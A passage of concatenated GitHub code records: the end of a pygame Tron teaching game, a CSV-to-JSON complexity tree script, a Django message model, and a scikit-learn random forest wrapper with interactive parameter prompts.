variables.player1_x_pos>=screen.get_width() : variables.player1_x_pos = 1 # VER: wrap\n if variables.player1_y_pos<=0 : variables.player1_y_pos = screen.get_height()-1 # VER: wrap HIDE\n if variables.player1_y_pos>=screen.get_height(): variables.player1_y_pos = 1 # VER: wrap HIDE\n if variables.player2_x_pos<=0 : variables.player2_x_pos = screen.get_width() -1 # VER: player2,wrap\n if variables.player2_x_pos>=screen.get_width() : variables.player2_x_pos = 1 # VER: player2,wrap\n if variables.player2_y_pos<=0 : variables.player2_y_pos = screen.get_height()-1 # VER: player2,wrap HIDE\n if variables.player2_y_pos>=screen.get_height(): variables.player2_y_pos = 1 # VER: player2,wrap HIDE\n # VER: wrap\n try : player1_at_pixel = screen.get_at((variables.player1_x_pos, variables.player1_y_pos)) # Ver: colide\n except: player1_at_pixel = None # Ver: colide\n if player1_at_pixel == variables.color_exit: # VER: maze\n variables.level_number += 1 # VER: maze\n if player1_at_pixel != variables.background_colour: # Ver: colide\n variables.player2_score = variables.player2_score + 1 # Ver: score\n reset() # Ver: colide\n # Ver: colide\n try : player2_at_pixel = screen.get_at((variables.player2_x_pos, variables.player2_y_pos)) # Ver: player2\n except: player2_at_pixel = None # Ver: player2 HIDE\n if player2_at_pixel != variables.background_colour: # Ver: player2\n variables.player1_score = variables.player1_score + 1 # Ver: score HIDE\n reset() # Ver: player2 HIDE\n # Ver: player2\n screen.set_at((variables.player1_x_pos, variables.player1_y_pos), variables.player1_color) # Ver: line\n screen.set_at((variables.player2_x_pos, variables.player2_y_pos), variables.player2_color) # Ver: player2 HIDE\n # Ver: line\n if variables.player1_score == 5 or variables.player2_score == 5: # Ver: score\n variables.running = False # Ver: score\n # Ver: score\n pygame.display.flip()\n\npygame.quit()\n # Ver: score\nprint(\"Player 1 Score\") # Ver: score\nprint(variables.player1_score) # Ver: score\nprint(\"Player 2 Score\") # Ver: score\nprint(variables.player2_score) # Ver: score","repo_name":"calaldees/TeachProgramming","sub_path":"teachprogramming/static/projects/game/tron.py","file_name":"tron.py","file_ext":"py","file_size_in_byte":7807,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"24949032585","text":"import json\nimport pathlib\nimport pandas as pd\nimport find_prefix\n\nclass test_json:\n def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__, \n sort_keys=True, indent=4)\n\ndef add_path_to_json(path, filename):\n aux = test_json()\n aux.name = filename\n aux.children = []\n\n path.children.append(aux)\n return aux\n\n\ndef add_method_to_json(path, method, complexity, filename, start_line, org, project):\n aux = test_json()\n aux.children = []\n\n aux.name = method.split(\"::\")[-1]\n\n if(len(aux.name) >=18):\n aux.name = aux.name[0:18] + \"...\"\n\n aux.name += \"()\"\n data = test_json()\n data.name = method+\"()\"\n data.size = complexity\n data.url = \"https://github.com/\" + org + \"/\" + project + \"/blob/master/\" + filename + \"#L\" + str(start_line)\n data.color = find_prefix.get_color(data.name)\n data.category = find_prefix.find_prefix(data.name)\n\n aux.color = data.color\n aux.children.append(data)\n path.children.append(aux)\n\n\ndef find_path(paths, name):\n for path in paths:\n if(path.name == name):\n return path\n return False\n\ndef csv_to_json(org, project):\n path_system = pathlib.Path(__file__).parents[1]\n df = pd.read_csv(str(path_system) + '/datasets/' + project + '.csv')\n df = df[df.cyclomatic_complexity >= 10]\n print(len(df))\n tree = test_json()\n tree.name = \"PROJECT - \" + project\n tree.children = []\n \n for index, row in df.iterrows():\n filename = row['filename']\n list_filename = filename.split('/')\n \n current = tree\n for path in list_filename:\n path_exist = find_path(current.children, path)\n\n if(path_exist == False):\n novo_path = add_path_to_json(current, path)\n current = novo_path\n else:\n current = path_exist\n\n add_method_to_json(current, row['name'], row['cyclomatic_complexity'], row['filename'], row['start_line'], org, project)\n\n #if(aux == 10):\n # break\n #aux+=1\n\n with open(str(path_system) + '/dist/' + project + '.json', 'w') as f:\n f.write(tree.toJSON())\n\n\ncsv_to_json('ytdl-org', 'youtube-dl')\ncsv_to_json('apple','swift')\ncsv_to_json('facebook','react')","repo_name":"MatLopes23/Complex-Circles","sub_path":"utils/csv_to_json.py","file_name":"csv_to_json.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74085704107","text":"import random\nfrom django.db import models\nfrom django_extensions.db.fields.json import JSONField\n\nclass Message(models.Model):\n key = models.CharField(max_length=40, primary_key=True)\n data = JSONField()\n\n @models.permalink\n def get_absolute_url(self):\n return ('view_message_online', (), {\n 'key': self.key,\n })\n\n def save(self, *args, **kwargs):\n if not self.key:\n while True:\n try:\n self.key = '%04x' % random.getrandbits(40 * 4)\n super(Message, self).save(*args, **kwargs)\n except:\n continue\n else:\n return\n\n super(Message, self).save(*args, **kwargs)\n\n def __unicode__(self):\n return u\"%s to %s\" % (self.data['subject'], ', '.join(self.data['to']))\n","repo_name":"amccloud/django-firstclass","sub_path":"firstclass/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"37"} +{"seq_id":"1385676468","text":"\"\"\"RandomForest trains a random forest model implemented by\nScikit-Learn on the given dataset. Before training, the user is\nprompted for parameter input. After training, model metrics are\ndisplayed, and the user can make new predictions. Classification and\nregression are both supported.\n\nView the documentation at https://manufacturingnet.readthedocs.io/.\n\"\"\"\n\nfrom math import sqrt\n\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.metrics import (accuracy_score, confusion_matrix, make_scorer,\n mean_squared_error, roc_auc_score, roc_curve)\nfrom sklearn.model_selection import (GridSearchCV, cross_val_score,\n train_test_split)\n\n\nclass RandomForest:\n \"\"\"Class framework for random forest classification and regression\n models.\n \"\"\"\n\n def __init__(self, attributes=None, labels=None):\n \"\"\"Initializes a RandomForest object.\"\"\"\n self.attributes = attributes\n self.labels = labels\n\n self.test_size = None\n self.cv = None\n self.graph_results = None\n self.fpr = None\n self.tpr = None\n self.bin = None\n self.gridsearch = False\n self.gs_params = None\n self.gs_result = None\n\n self.classifier = None\n self.accuracy = None\n self.roc_auc = None\n self.confusion_matrix = None\n self.cross_val_scores_classifier = None\n self.feature_importances_classifier = None\n\n self.regressor = None\n self.r2_score = None\n self.r_score = None\n self.mean_squared_error = None\n self.cross_val_scores_regressor = None\n self.feature_importances_regressor = None\n\n # Accessor methods\n\n def get_attributes(self):\n \"\"\"Accessor method for attributes.\"\"\"\n return self.attributes\n\n def get_labels(self):\n \"\"\"Accessor method for labels.\"\"\"\n return self.labels\n\n def get_classifier(self):\n \"\"\"Accessor method for classifier.\"\"\"\n return self.classifier\n\n def get_accuracy(self):\n \"\"\"Accessor method for accuracy.\"\"\"\n return self.accuracy\n\n def get_roc_auc(self):\n \"\"\"Accessor method for roc_auc.\"\"\"\n return self.roc_auc\n\n def get_confusion_matrix(self):\n \"\"\"Accessor method for confusion_matrix.\"\"\"\n return self.confusion_matrix\n\n def get_cross_val_scores_classifier(self):\n \"\"\"Accessor method for cross_val_scores_classifier.\"\"\"\n return self.cross_val_scores_classifier\n\n def get_feature_importances_classifier(self):\n \"\"\"Accessor method for feature_importances_classifier.\"\"\"\n return self.feature_importances_classifier\n\n def get_regressor(self):\n \"\"\"Accessor method for regressor.\"\"\"\n return self.regressor\n\n def get_r2_score(self):\n \"\"\"Accessor method for r2_score.\"\"\"\n return self.r2_score\n\n def get_r_score(self):\n \"\"\"Accessor method for r_score.\"\"\"\n return self.r_score\n\n def get_mean_squared_error(self):\n \"\"\"Accessor method for mean_squared_error.\"\"\"\n return self.mean_squared_error\n\n def get_cross_val_scores_regressor(self):\n \"\"\"Accessor method for cross_val_scores_regressor.\"\"\"\n return self.cross_val_scores_regressor\n\n def get_feature_importances_regressor(self):\n \"\"\"Accessor method for feature_importances_regressor.\"\"\"\n return self.feature_importances_regressor\n\n # Modifier methods\n\n def set_attributes(self, new_attributes=None):\n \"\"\"Modifier method for attributes.\"\"\"\n self.attributes = new_attributes\n\n def set_labels(self, new_labels=None):\n \"\"\"Modifier method for labels.\"\"\"\n self.labels = new_labels\n\n # Wrappers for RandomForest classes\n\n def run_classifier(self):\n \"\"\"Provides random forest's classifier functionality.\"\"\"\n if self._check_inputs():\n # Initialize classifier\n self.classifier = self._create_model(classifier=True)\n\n # Split attributes and labels into training/testing data\n dataset_X_train, dataset_X_test, dataset_y_train, dataset_y_test = \\\n train_test_split(self.attributes, self.labels,\n test_size=self.test_size)\n\n # Train classifier\n # Handle exception if arguments are incorrect\n try:\n self.classifier.fit(dataset_X_train, dataset_y_train)\n except Exception as e:\n print(\"An exception occurred while training the\",\n \"classification model. Check your arguments and try\",\n \"again.\")\n print(\"Here is the exception message:\")\n print(e)\n self.classifier = None\n return\n\n # Metrics\n self.accuracy = self.classifier.score(dataset_X_test,\n dataset_y_test)\n\n y_prediction = self.classifier.predict(dataset_X_test)\n\n probas = self.classifier.predict_proba(dataset_X_test)\n\n # If classification is binary, calculate roc_auc\n if probas.shape[1] == 2:\n self.bin = True\n self.roc_auc = roc_auc_score(y_prediction, probas[::, 1])\n self.fpr, self.tpr, _ = roc_curve(\n dataset_y_test, probas[::, 1])\n # Else, calculate confusion matrix\n else:\n self.confusion_matrix = confusion_matrix(dataset_y_test,\n y_prediction)\n\n self.cross_val_scores_classifier = \\\n cross_val_score(self.classifier, self.attributes, self.labels,\n cv=self.cv)\n self.feature_importances_classifier = \\\n self.classifier.feature_importances_\n\n # Output results\n self._output_classifier_results()\n\n def run_regressor(self):\n \"\"\"Provides random forest's regressor functionality.\"\"\"\n if self._check_inputs():\n # Initialize regressor\n self.regressor = self._create_model(classifier=False)\n\n # Split attributes and labels into training/testing data\n dataset_X_train, dataset_X_test, dataset_y_train, dataset_y_test =\\\n train_test_split(self.attributes, self.labels,\n test_size=self.test_size)\n\n # Train regressor\n # Handle exception if arguments are incorrect and/or labels\n # isn't quantitative\n try:\n self.regressor.fit(dataset_X_train, dataset_y_train)\n except Exception as e:\n print(\"An exception occurred while training the regressor\",\n \"model. Check your arguments and try again.\")\n print(\"Does labels contain only quantitative data?\")\n print(\"Here is the exception message:\")\n print(e)\n self.regressor = None\n return\n\n # Metrics\n self.r2_score = self.regressor.score(\n dataset_X_test, dataset_y_test)\n if self.r2_score >= 0:\n self.r_score = sqrt(self.r2_score)\n\n self.mean_squared_error = \\\n mean_squared_error(dataset_y_test,\n self.regressor.predict(dataset_X_test))\n self.cross_val_scores_regressor = \\\n cross_val_score(self.regressor, self.attributes, self.labels,\n cv=self.cv)\n self.feature_importances_regressor = \\\n self.regressor.feature_importances_\n\n # Output results\n self._output_regressor_results()\n\n def predict_classifier(self, dataset_X=None):\n \"\"\"Classifies each datapoint in dataset_X using the classifier\n model. Returns the predicted classifications.\n \"\"\"\n # Check that run_classifier() has already been called\n if self.classifier is None:\n print(\"The classifier model seems to be missing. Have you called\",\n \"run_classifier() yet?\")\n return None\n\n # Try to make the prediction\n # Handle exception if dataset_X isn't a valid input\n try:\n y_prediction = self.classifier.predict(dataset_X)\n except Exception as e:\n print(\"The model failed to run. Check your inputs and try again.\")\n print(\"Here is the exception message:\")\n print(e)\n return None\n\n print(\"\\nRandomForestClassifier Predictions:\\n\", y_prediction, \"\\n\")\n return y_prediction\n\n def predict_regressor(self, dataset_X=None):\n \"\"\"Predicts the output of each datapoint in dataset_X using the\n regressor model. Returns the predictions.\n \"\"\"\n # Check that run_regressor() has already been called\n if self.regressor is None:\n print(\"The regressor model seems to be missing. Have you called\",\n \"run_regressor() yet?\")\n return None\n\n # Try to make the prediction\n # Handle exception if dataset_X isn't a valid input\n try:\n y_prediction = self.regressor.predict(dataset_X)\n except Exception as e:\n print(\"The model failed to run. Check your inputs and try again.\")\n print(\"Here is the exception message:\")\n print(e)\n return None\n\n print(\"\\nRandomForestRegressor Predictions:\\n\", y_prediction, \"\\n\")\n return y_prediction\n\n # Helper methods\n\n def _create_model(self, classifier):\n \"\"\"Runs UI for getting parameters and creating classifier or\n regression model.\n \"\"\"\n if classifier:\n print(\"\\n===========================================\")\n print(\"= RandomForestClassifier Parameter Inputs =\")\n print(\"===========================================\\n\")\n else:\n print(\"\\n==========================================\")\n print(\"= RandomForestRegressor Parameter Inputs =\")\n print(\"==========================================\\n\")\n\n print(\"Default values:\", \"test_size = 0.25\", \"cv = 5\", sep=\"\\n\")\n if classifier:\n print(\"graph_results = False\", \"criterion = 'gini'\",\n \"class_weight = None\", sep=\"\\n\")\n else:\n print(\"criterion = 'mse'\")\n\n print(\"n_estimators = 100\",\n \"max_depth = None\",\n \"min_samples_split = 2\",\n \"min_samples_leaf = 1\",\n \"min_weight_fraction_leaf = 0.0\",\n \"max_features = 'auto'\",\n \"max_leaf_nodes = None\",\n \"min_impurity_decrease = 0.0\",\n \"bootstrap = True\",\n \"oob_score = False\",\n \"n_jobs = None\",\n \"random_state = None\",\n \"verbose = 0\",\n \"warm_start = False\",\n \"ccp_alpha = 0.0\",\n \"max_samples = None\", sep=\"\\n\")\n\n # Set defaults\n self.test_size = 0.25\n self.cv = None\n self.graph_results = False\n\n while True:\n user_input = input(\"\\nUse default parameters (Y/n)? \").lower()\n if user_input in {\"y\", \"\"}:\n print(\"\\n===========================================\")\n print(\"= End of inputs; press enter to continue. =\")\n input(\"===========================================\\n\")\n if classifier:\n return RandomForestClassifier()\n return RandomForestRegressor()\n elif user_input == \"n\":\n break\n else:\n print(\"Invalid input.\")\n\n print(\"\\nIf you are unsure about a parameter, press enter to use its\",\n \"default value.\")\n print(\"If you finish entering parameters early, enter 'q' to skip\",\n \"ahead.\\n\")\n\n # Set more defaults\n if classifier:\n criterion = \"gini\"\n class_weight = None\n else:\n criterion = \"mse\"\n\n n_estimators = 100\n max_depth = None\n min_samples_split = 2\n min_samples_leaf = 1\n min_weight_fraction_leaf = 0.0\n max_features = \"auto\"\n max_leaf_nodes = None\n min_impurity_decrease = 0.0\n bootstrap = True\n oob_score = False\n n_jobs = None\n random_state = None\n verbose = 0\n warm_start = False\n ccp_alpha = 0.0\n max_samples = None\n\n # Get user parameter input\n while True:\n break_early = False\n while True:\n user_input = input(\"\\nWhat fraction of the dataset should be the \"\n + \"testing set (0,1)? \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = float(user_input)\n if user_input <= 0 or user_input >= 1:\n raise Exception\n\n self.test_size = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"test_size =\", self.test_size)\n\n if break_early:\n break\n\n while True:\n user_input = input(\"\\nUse GridSearch to find the best \"\n + \"hyperparameters (y/N)? \").lower()\n if user_input == \"q\":\n break_early = True\n break\n elif user_input in {\"n\", \"y\", \"\"}:\n break\n else:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n while user_input == \"y\":\n print(\"\\n= GridSearch Parameter Inputs =\\n\")\n print(\"Enter 'q' to skip GridSearch.\")\n self.gridsearch = True\n params = {}\n\n while True:\n print(\"\\nEnter the max_features for the best split.\")\n print(\"Options: 1-auto, 2-sqrt, 3-log2. Enter 'all' for all\",\n \"options.\")\n print(\"Example input: 1,2,3\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n elif user_input == \"all\":\n feat_params = [\"auto\", \"sqrt\", \"log2\"]\n break\n else:\n feat_dict = {1: \"auto\", 2: \"sqrt\", 3: \"log2\"}\n try:\n feat_params_int = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(feat_params_int) > len(feat_dict):\n raise Exception\n\n feat_params = []\n for each in feat_params_int:\n if not feat_dict.get(each):\n raise Exception\n\n feat_params.append(feat_dict.get(each))\n break\n except Exception:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n params[\"max_features\"] = feat_params\n print(\"max_features:\", feat_params)\n\n while True:\n print(\"\\nEnter the list of num_estimators to try out.\")\n print(\"Example input: 1,2,3\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n\n try:\n n_est_params = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(n_est_params) == 0:\n raise Exception\n\n for num in n_est_params:\n if num <= 0:\n raise Exception\n break\n except Exception:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n params[\"n_estimators\"] = n_est_params\n print(\"n_estimators:\", n_est_params)\n\n while True:\n print(\"\\nEnter the criterion to be tried for.\")\n\n if classifier:\n print(\"Options: 1-'gini', 2-'entropy'. Enter 'all' for\",\n \"all options.\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n elif user_input == \"all\":\n crit_params = [\"gini\", \"entropy\"]\n break\n else:\n crit_dict = {1: \"gini\", 2: \"entropy\"}\n try:\n crit_params_int = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(crit_params_int) > len(crit_dict):\n raise Exception\n\n crit_params = []\n for each in crit_params_int:\n if not crit_dict.get(each):\n raise Exception\n\n crit_params.append(crit_dict.get(each))\n break\n except Exception:\n print(\"Invalid input.\")\n else:\n print(\"Options: 1-'mse', 2-'mae'. Enter 'all' for all\",\n \"options.\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n elif user_input == \"all\":\n crit_params = [\"mse\", \"mae\"]\n break\n else:\n crit_dict = {1: \"mse\", 2: \"mae\"}\n try:\n crit_params_int = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(crit_params_int) > len(crit_dict):\n raise Exception\n\n crit_params = []\n for each in crit_params_int:\n if not crit_dict.get(each):\n raise Exception\n\n crit_params.append(crit_dict.get(each))\n break\n except Exception:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n params[\"criterion\"] = crit_params\n print(\"criterion:\", crit_params)\n\n while True:\n print(\"\\nEnter the maximum depth of trees to try for.\")\n print(\"Example input: 1,2,3\")\n user_input = input().lower()\n\n if user_input == \"q\":\n self.gridsearch = False\n break_early = True\n break\n\n try:\n max_dep_params = \\\n list(map(int, list(user_input.split(\",\"))))\n if len(max_dep_params) == 0:\n raise Exception\n\n for num in max_dep_params:\n if num <= 0:\n raise Exception\n break\n except Exception:\n print(\"Invalid input.\")\n\n if break_early:\n break\n\n params[\"max_depth\"] = max_dep_params\n print(\"max_depths:\", max_dep_params)\n\n print(\"\\n= End of GridSearch inputs. =\\n\")\n self.gs_params = params\n best_params = self._run_gridsearch(classifier)\n criterion = best_params[\"criterion\"]\n max_depth = best_params[\"max_depth\"]\n max_features = best_params[\"max_features\"]\n n_estimators = best_params[\"n_estimators\"]\n break\n\n break_early = False\n\n while True:\n user_input = input(\"\\nEnter the number of folds for cross \"\n + \"validation [2,): \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input < 2:\n raise Exception\n\n self.cv = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"cv =\", self.cv)\n\n if break_early:\n break\n\n while classifier:\n user_input = \\\n input(\"\\nGraph the ROC curve? Only binary classification \"\n + \"is supported (y/N): \").lower()\n if user_input == \"y\":\n self.graph_results = True\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n if classifier:\n print(\"graph_results =\", self.graph_results)\n\n if break_early:\n break\n\n while not self.gridsearch:\n user_input = \\\n input(\"\\nEnter a positive number of trees for the forest: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input <= 0:\n raise Exception\n\n n_estimators = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n if not self.gridsearch:\n print(\"n_estimators =\", n_estimators)\n\n if break_early:\n break\n\n while not self.gridsearch:\n print(\"\\nWhich criteria should be used for measuring split\",\n \"quality?\")\n if classifier:\n user_input = input(\n \"Enter 1 for 'gini' or 2 for 'entropy': \")\n if user_input == \"2\":\n criterion = \"entropy\"\n break\n elif user_input in {\"1\", \"\"}:\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n else:\n user_input = input(\"Enter 1 for 'mse' or 2 for 'mae': \")\n if user_input == \"2\":\n criterion = \"mae\"\n break\n elif user_input in {\"1\", \"\"}:\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n if not self.gridsearch:\n print(\"criterion =\", criterion)\n\n if break_early:\n break\n\n while classifier:\n user_input = input(\"\\nAutomatically balance the class weights \"\n + \"(y/N)? \").lower()\n if user_input == \"y\":\n class_weight = \"balanced\"\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n if classifier:\n print(\"class_weight =\", class_weight)\n\n if break_early:\n break\n\n while not self.gridsearch:\n print(\"\\nEnter a positive maximum tree depth.\")\n user_input = input(\"Press enter for no maximum depth: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input <= 0:\n raise Exception\n\n max_depth = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n if not self.gridsearch:\n print(\"max_depth =\", max_depth)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter min_samples_split, a positive minimum number \"\n + \"of samples required to split an internal node: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n if int(user_input) < 1:\n if float(user_input) <= 0:\n raise Exception\n\n min_samples_split = float(user_input)\n else:\n if int(user_input) <= 0:\n raise Exception\n\n min_samples_split = int(user_input)\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"min_samples_split =\", min_samples_split)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter min_samples_leaf, a positive minimum number \"\n + \"of samples required to be at a leaf node: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n if int(user_input) < 1:\n if float(user_input) <= 0:\n raise Exception\n\n min_samples_leaf = float(user_input)\n else:\n if int(user_input) <= 0:\n raise Exception\n\n min_samples_leaf = int(user_input)\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"min_samples_leaf =\", min_samples_leaf)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter min_weight_fraction_leaf, the minimum \"\n + \"weighted fraction of the weight total required to \"\n + \"be at a leaf node [0,0.5]: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = float(user_input)\n if user_input < 0 or user_input > 0.5:\n raise Exception\n\n min_weight_fraction_leaf = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"min_weight_fraction_leaf =\", min_weight_fraction_leaf)\n\n if break_early:\n break\n\n while not self.gridsearch:\n print(\"\\nHow many features should be considered when looking\",\n \"for the best split?\")\n print(\"Enter 'auto' to use n_features, 'sqrt' to use\",\n \"sqrt(n_features), 'log2' to use log2(n_features) or a\",\n \"positive number/fraction: \")\n user_input = input().lower()\n\n try:\n if user_input in {\"sqrt\", \"log2\", \"auto\"}:\n max_features = user_input\n break\n elif user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n if int(user_input) == 0:\n user_input = float(user_input)\n else:\n user_input = int(user_input)\n\n if user_input <= 0:\n raise Exception\n\n max_features = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n if not self.gridsearch:\n print(\"max_features =\", max_features)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter a positive maximum number of leaf nodes: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input <= 0:\n raise Exception\n\n max_leaf_nodes = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"max_leaf_nodes =\", max_leaf_nodes)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter minimum_impurity_decrease [0,): \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = float(user_input)\n if user_input < 0:\n raise Exception\n\n min_impurity_decrease = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"min_impurity_decrease =\", min_impurity_decrease)\n\n if break_early:\n break\n\n while True:\n user_input = input(\"\\nUse bootstrap samples when building \"\n + \"trees (Y/n)? \").lower()\n if user_input == \"n\":\n bootstrap = False\n break\n elif user_input in {\"y\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n print(\"bootstrap =\", bootstrap)\n\n if break_early:\n break\n\n while True:\n user_input = input(\"\\nUse out-of-bag samples to estimate R2 \"\n + \"scores on unseen data (y/N)? \").lower()\n if user_input == \"y\":\n oob_score = True\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n print(\"oob_score =\", oob_score)\n\n if break_early:\n break\n\n while True:\n print(\"\\nEnter a positive number of CPU cores to use.\")\n user_input = input(\"Enter -1 to use all cores: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = int(user_input)\n if user_input <= 0 and user_input != -1:\n raise Exception\n\n n_jobs = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"n_jobs =\", n_jobs)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter an integer for the random number seed: \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n random_state = int(user_input)\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"random_state =\", random_state)\n\n if break_early:\n break\n\n while True:\n user_input = input(\"\\nEnable verbose output during training \"\n + \"(y/N)? \").lower()\n if user_input == \"y\":\n verbose = 1\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n print(\"verbose =\", bool(verbose))\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnable warm start? This will use the previous \"\n + \"solution for fitting (y/N): \").lower()\n if user_input == \"y\":\n warm_start = True\n break\n elif user_input in {\"n\", \"\"}:\n break\n elif user_input == \"q\":\n break_early = True\n break\n else:\n print(\"Invalid input.\")\n\n print(\"warm_start =\", warm_start)\n\n if break_early:\n break\n\n while True:\n user_input = \\\n input(\"\\nEnter ccp_alpha, the complexity parameter for \"\n + \"Minimal Cost-Complexity Pruning [0,): \")\n try:\n if user_input == \"\":\n break\n elif user_input.lower() == \"q\":\n break_early = True\n break\n\n user_input = float(user_input)\n if user_input < 0:\n raise Exception\n\n ccp_alpha = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n print(\"ccp_alpha =\", ccp_alpha)\n\n if break_early:\n break\n\n while bootstrap:\n user_input = \\\n input(\"\\nEnter a positive number/fraction for the maximum \"\n + \"number of samples to train the base estimators: \")\n try:\n if user_input.lower() in {\"q\", \"\"}:\n break\n\n if int(user_input) == 0:\n user_input = float(user_input)\n else:\n user_input = int(user_input)\n\n if user_input <= 0:\n raise Exception\n\n max_samples = user_input\n break\n except Exception:\n print(\"Invalid input.\")\n\n if bootstrap:\n print(\"max_samples =\", max_samples)\n\n break\n\n print(\"\\n===========================================\")\n print(\"= End of inputs; press enter to continue. =\")\n input(\"===========================================\\n\")\n\n if classifier:\n return RandomForestClassifier(n_estimators=n_estimators,\n criterion=criterion,\n max_depth=max_depth,\n min_samples_split=min_samples_split,\n min_samples_leaf=min_samples_leaf,\n min_weight_fraction_leaf=min_weight_fraction_leaf,\n max_features=max_features,\n max_leaf_nodes=max_leaf_nodes,\n min_impurity_decrease=min_impurity_decrease,\n bootstrap=bootstrap, oob_score=oob_score,\n n_jobs=n_jobs, random_state=random_state,\n verbose=verbose, warm_start=warm_start,\n class_weight=class_weight,\n ccp_alpha=ccp_alpha,\n max_samples=max_samples)\n\n return RandomForestRegressor(n_estimators=n_estimators,\n criterion=criterion, max_depth=max_depth,\n min_samples_split=min_samples_split,\n min_samples_leaf=min_samples_leaf,\n min_weight_fraction_leaf=min_weight_fraction_leaf,\n max_features=max_features,\n max_leaf_nodes=max_leaf_nodes,\n min_impurity_decrease=min_impurity_decrease,\n bootstrap=bootstrap, oob_score=oob_score,\n n_jobs=n_jobs, random_state=random_state,\n verbose=verbose, warm_start=warm_start,\n ccp_alpha=ccp_alpha,\n max_samples=max_samples)\n\n def _output_classifier_results(self):\n \"\"\"Outputs model metrics after run_classifier() finishes.\"\"\"\n print(\"\\n==================================\")\n print(\"= RandomForestClassifier Results =\")\n print(\"==================================\\n\")\n\n print(\"Classes:\\n\", self.classifier.classes_)\n print(\"\\n{:<20} {:<20}\".format(\"Accuracy:\", self.accuracy))\n\n if self.bin:\n print(\"\\n{:<20} {:<20}\".format(\"ROC AUC:\", self.roc_auc))\n else:\n print(\"\\nConfusion Matrix:\\n\", self.confusion_matrix)\n\n print(\"\\nCross Validation Scores:\", self.cross_val_scores_classifier)\n print(\"\\nFeature Importances:\", self.feature_importances_classifier)\n\n if self.gridsearch:\n print(\"\\n{:<20} {:<20}\".format(\"GridSearch Score:\",\n self.gs_result))\n\n if self.bin and self.graph_results:\n plt.plot(self.fpr, self.tpr, label=\"data 1\")\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n plt.title(\"ROC Curve\")\n plt.legend(loc=4)\n plt.show()\n\n print(\"\\n\\nCall predict_classifier() to make predictions for new data.\")\n\n 